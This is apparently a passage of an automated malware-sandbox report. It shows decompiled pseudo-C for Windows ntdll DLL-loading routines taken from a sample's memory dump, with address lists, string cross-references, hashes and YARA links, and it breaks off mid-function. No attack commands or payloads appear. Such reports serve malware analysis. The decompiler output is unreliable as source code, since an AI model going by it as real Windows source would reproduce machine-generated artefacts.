0x019f3f50
0x019f3f53
0x019f3f58
0x019f3f65
0x019f3f65
0x019f3f6a
0x00000000
0x019f3f6a
0x019f3edd
0x019f3dda
0x019f3ddd
0x019f3de0
0x019f3de5
0x01a48245
0x019f3deb
0x019f3df7
0x019f3dfc
0x019f3dfe
0x019f3e01
0x019f3e01
0x019f3e06
0x01a4824d
0x01a4824f
0x01a48254
0x00000000
0x019f3e0c
0x019f3e11
0x019f3e16
0x019f3e19
0x019f3e29
0x019f3e2c
0x019f3e2f
0x01a4825c
0x01a4825f
0x01a48261
0x01a48264
0x01a4826c
0x01a48280
0x01a48282
0x01a48282
0x01a48289
0x01a48290
0x01a48293
0x01a48294
0x01a48298
0x01a4829b
0x01a4829b
0x019f3e35
0x019f3e38
0x019f3e3d
0x019f3e44
0x019f3e58
0x01a482a3
0x01a482a3
0x019f3e58
0x019f3e60
0x019f3e6f
0x019f3e74
0x019f3e77
0x019f3e77
0x019f3e7a
0x019f3e7f
0x019f3e8c
0x019f3e8c
0x019f3e91
0x00000000
0x019f3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 019F3E97
Kernel-MUI-Language-SKU, xrefs: 019F3F70
Kernel-MUI-Number-Allowed, xrefs: 019F3D8C
WindowsExcludedProcs, xrefs: 019F3D6F
Kernel-MUI-Language-Allowed, xrefs: 019F3DC0

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 4438f5ddc967a221e3956590f151bc60872380fb33b9ede290e797b9aba6c8ce
Instruction ID: 4be09dca1442d75acb079b9b046a697fb238a206e36b59298c9531d3b1c9e0b4
Opcode Fuzzy Hash: 4438f5ddc967a221e3956590f151bc60872380fb33b9ede290e797b9aba6c8ce
Instruction Fuzzy Hash: 38F13E72D00619EFDB11DFD8D940EEEBBB9FF58650F15006AEA05A7250D7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406A67, Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

i, xrefs: 00406B4D
b, xrefs: 00406B54
d, xrefs: 00406B62
C, xrefs: 00406B46
a, xrefs: 00406B5B

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C$a$b$d$i
API String ID: 0-2334916691
Opcode ID: b8892ec69081c7b24f2585f778c656e577f50cd8f304f7dc84ab08b41cd81e8f
Instruction ID: aeb7b1b9c9f26c225bd6a004ef89ffeffa4d9365ef031c2cab20e555404f68c3
Opcode Fuzzy Hash: b8892ec69081c7b24f2585f778c656e577f50cd8f304f7dc84ab08b41cd81e8f
Instruction Fuzzy Hash: 4241F3B1A00208AAEB10DF61DC81FFEB3B8EF82708F00451EF515AB241E7796945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 01A18E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01A18E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1add360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1ad8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1ad5780 & 0x00000003) != 0) {
							E01A65510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1ad5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E01A2B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1ad7984; // 0x14c2c00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1ad8464; // 0x74790110
					 *0x1adb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01A19B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1ad5780 & 0x00000005) != 0) {
						_push(_t49);
						E01A65510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01a18e0f
0x01a18e16
0x01a18e19
0x01a18e1b
0x01a18e21
0x01a18e7f
0x01a18e85
0x01a59354
0x01a5936c
0x01a59371
0x01a5937b
0x01a59381
0x01a59381
0x01a5937b
0x01a18e9d
0x01a18e9d
0x01a18e29
0x01a18e2c
0x01a18e38
0x01a18e3e
0x01a18e43
0x01a18eb5
0x01a18eb9
0x01a592aa
0x01a592af
0x01a592e8
0x01a592e8
0x01a592af
0x01a18eb9
0x01a18e45
0x01a18e53
0x01a18e5b
0x01a18e5f
0x01a18e78
0x01a18e78
0x01a18e7d
0x01a18ec3
0x01a18ecd
0x01a18ed2
0x01a18ed2
0x01a18ec5
0x01a18ec5
0x00000000
0x01a18e7d
0x01a18e67
0x01a18ea4
0x01a5931a
0x00000000
0x00000000
0x01a59320
0x01a18ea4
0x01a18e70
0x01a59325
0x01a59340
0x01a59345
0x01a59345
0x01a18e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01A5932A
LdrpFindDllActivationContext, xrefs: 01A59331, 01A5935D
minkernel\ntdll\ldrsnap.c, xrefs: 01A5933B, 01A59367
Querying the active activation context failed with status 0x%08lx, xrefs: 01A59357

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 680cf63bb8b47737c44e74da368d7c76d718667d68ac4d9e9558d4b9e9d3bfe7
Instruction ID: e3809c6dc9e533149ac2ed8b99aae96b0ea05ce0a3d2355590e1c92704b8cf06
Opcode Fuzzy Hash: 680cf63bb8b47737c44e74da368d7c76d718667d68ac4d9e9558d4b9e9d3bfe7
Instruction Fuzzy Hash: 0E412AB2E00311DFDF35AB1CC849A76BAB5AB41654F0A412DE949975DAE778DC8083C1

Uniqueness

Uniqueness Score: -1.00%

Function 019F8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E019F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E019F934A() != 0) {
								_t159 = E01A6A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1ad5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01A65510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1ad5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E019F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E019F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E019F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1ad5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1ad5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01A02280(_t92, 0x1ad86cc);
															_t94 = E01AB9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E01A161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1ad5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E019F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1ad5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1ad5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E01A2F380(_t136, 0x19c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01A02280(_t108, 0x1ad86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E01A161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01AB9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E019FFFB0(_t118, _t156, 0x1ad86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01A29A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x019f8799
0x019f879d
0x019f87a1
0x019f87a3
0x019f87a8
0x019f87c3
0x019f87c3
0x019f87c8
0x019f87d1
0x019f87d4
0x019f87d8
0x019f87e5
0x019f87ec
0x01a49bfe
0x01a49c00
0x01a49c02
0x01a49c08
0x01a49c0d
0x01a49c0f
0x01a49c14
0x01a49c2d
0x01a49c32
0x01a49c37
0x01a49c3a
0x01a49c3c
0x01a49c42
0x01a49c42
0x01a49c3c
0x01a49c02
0x019f87da
0x019f87df
0x019f87e3
0x00000000
0x00000000
0x019f87e3
0x019f87f2
0x00000000
0x019f87fb
0x019f87fd
0x019f87fe
0x019f880e
0x019f880f
0x019f8810
0x019f8814
0x019f881a
0x019f881c
0x019f881f
0x019f8821
0x019f8822
0x019f8824
0x019f8826
0x019f882c
0x019f882e
0x01a49c48
0x01a49c48
0x019f8834
0x019f8834
0x019f8837
0x00000000
0x00000000
0x019f8837
0x019f882e
0x019f883d
0x019f8840
0x019f8843
0x019f8846
0x019f8849
0x019f884c
0x019f884e
0x019f8850
0x019f8852
0x019f8854
0x019f8857
0x019f88b4
0x019f88b6
0x019f88b6
0x019f8859
0x019f8859
0x019f8859
0x019f8861
0x019f8866
0x019f886a
0x019f893d
0x019f8941
0x00000000
0x019f8947
0x019f8947
0x019f894a
0x019f894c
0x00000000
0x019f8952
0x019f8955
0x019f895a
0x019f895d
0x019f895d
0x019f895f
0x019f8961
0x019f8961
0x019f8968
0x00000000
0x00000000
0x019f896a
0x019f896b
0x019f896e
0x00000000
0x019f8970
0x019f8970
0x019f8970
0x019f8970
0x019f8972
0x019f8972
0x019f8974
0x00000000
0x019f897a
0x019f897a
0x019f897d
0x00000000
0x019f8983
0x01a49c65
0x01a49c6d
0x01a49c72
0x01a49c75
0x01a49c75
0x01a49c82
0x01a49c86
0x01a49c87
0x01a49c88
0x01a49c89
0x01a49c8c
0x01a49c90
0x01a49c95
0x01a49c97
0x01a49ca0
0x01a49ca3
0x01a49ca9
0x01a49ca9
0x00000000
0x01a49ca9
0x01a49ca3
0x00000000
0x01a49c97
0x019f897d
0x00000000
0x019f8974
0x019f8988
0x019f8992
0x019f8996
0x00000000
0x019f8996
0x019f894c
0x00000000
0x019f8870
0x019f887b
0x019f887d
0x019f887f
0x019f8881
0x019f8884
0x019f8884
0x019f8886
0x019f8889
0x019f888c
0x019f888e
0x019f8891
0x019f8891
0x019f8898
0x00000000
0x00000000
0x019f889a
0x019f889b
0x019f889e
0x00000000
0x00000000
0x019f88a0
0x019f88a8
0x019f88b0
0x019f88b2
0x019f88d3
0x019f88d5
0x00000000
0x019f88d7
0x019f88db
0x019f88dc
0x019f88e0
0x019f88e8
0x019f88ee
0x019f88f0
0x019f88f3
0x019f88fc
0x019f8901
0x019f8906
0x019f890c
0x019f890c
0x019f890f
0x019f8916
0x019f8917
0x019f8918
0x019f8919
0x019f891a
0x019f891f
0x019f8921
0x01a49c52
0x01a49c55
0x01a49c5b
0x01a49cac
0x01a49cc0
0x01a49cc0
0x01a49c55
0x019f8927
0x019f8927
0x019f892f
0x019f8933
0x00000000
0x019f88f5
0x019f88f5
0x00000000
0x019f88f7
0x019f88f7
0x019f88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x019f88fa
0x019f88f5
0x019f88f3
0x00000000
0x019f88d5
0x00000000
0x019f88b2
0x019f88c9
0x00000000
0x019f88c9
0x019f887f
0x019f886a
0x019f8857
0x019f8852
0x019f88bf
0x019f88bf
0x019f87aa
0x019f87ad
0x019f87ae
0x019f87b4
0x019f87b5
0x019f87b6
0x019f87b8
0x019f87bd
0x019f87c1
0x019f87f4
0x019f87fa
0x00000000
0x00000000
0x00000000
0x019f87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01A49C28
LdrpDoPostSnapWork, xrefs: 01A49C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01A49C18

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 4dbba7ab7e61352008fafabc0959e19c6eea54a04616f282a2e6b8af01754188
Instruction ID: fe3690bad5d66f0298d111f978e18e0dbed32a037dc58e228aae06e6c7ebfc6f
Opcode Fuzzy Hash: 4dbba7ab7e61352008fafabc0959e19c6eea54a04616f282a2e6b8af01754188
Instruction Fuzzy Hash: 16911231A00206BFEF98DF59D480ABABBB9FF84315F14416DDB19AB241D730E951CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019F7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E019F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E019FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E019EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1ad5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01A65510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1ad5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01A07D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01A07D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01A67016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01A07D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01A07D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01A67016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E01A1A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E019EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x019f7e4c
0x019f7e50
0x019f7e55
0x019f7e58
0x019f7e5d
0x019f7e71
0x019f7f33
0x019f7e77
0x019f7e77
0x019f7e79
0x019f7e79
0x019f7e7e
0x019f7f45
0x01a49848
0x00000000
0x01a49848
0x019f7f4e
0x019f7f53
0x019f7f5a
0x00000000
0x00000000
0x01a4985a
0x01a49862
0x01a49866
0x00000000
0x01a4986c
0x00000000
0x01a4986c
0x019f7e84
0x019f7e84
0x019f7e8d
0x01a49871
0x019f7eb8
0x019f7ec0
0x019f7ec0
0x019f7e9a
0x01a4987e
0x00000000
0x00000000
0x01a49884
0x01a4988b
0x01a498a7
0x01a498ac
0x01a498b1
0x01a498b6
0x01a498b8
0x01a498b8
0x01a498b9
0x00000000
0x01a498b9
0x019f7ea0
0x019f7ea7
0x00000000
0x00000000
0x019f7eac
0x019f7eb1
0x019f7ec6
0x019f7ed0
0x01a498cc
0x019f7ed6
0x019f7ed6
0x019f7ed6
0x019f7ede
0x019f7ee3
0x01a498e3
0x01a498f0
0x01a49902
0x01a498f2
0x01a498fb
0x01a498fb
0x01a49907
0x01a4991d
0x01a4991d
0x01a49907
0x01a498e3
0x019f7ef0
0x019f7f14
0x019f7f14
0x019f7f1e
0x01a49946
0x019f7f24
0x019f7f24
0x019f7f24
0x019f7f2c
0x01a4996a
0x01a49975
0x01a49975
0x01a4997e
0x01a49993
0x01a49993
0x01a4997e
0x00000000
0x019f7ef2
0x019f7efc
0x019f7f0a
0x019f7f0e
0x01a49933
0x00000000
0x01a49933
0x00000000
0x019f7f0e
0x00000000
0x00000000
0x00000000
0x019f7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 01A498A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01A49891
LdrpCompleteMapModule, xrefs: 01A49898

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 5eefee0fc44962a626e65ac724073170a28c97452b30125b8a39dec81ba742fe
Instruction ID: c41a1f9533a916c0da17b8da89ae7864eb5b53e2b3321c586075a6826d8ceeb5
Opcode Fuzzy Hash: 5eefee0fc44962a626e65ac724073170a28c97452b30125b8a39dec81ba742fe
Instruction Fuzzy Hash: D351E231A00745ABE72ACFACC944B2A7BE4AB44714F14059EEA599B3E2D730FD10CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019EE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E019EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E019EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E01A295D0();
						}
						if(_t78 != 0) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E01A2FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E01A2BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01A29600();
					if(_t97 < 0) {
						goto L6;
					}
					E01A2BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L019EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E01A2BB40(_t83, _t102 + 0x24, _t78);
								if(L019F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E01A2BB40(_t84, _t102 + 0x24, _t94);
									if(L019F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
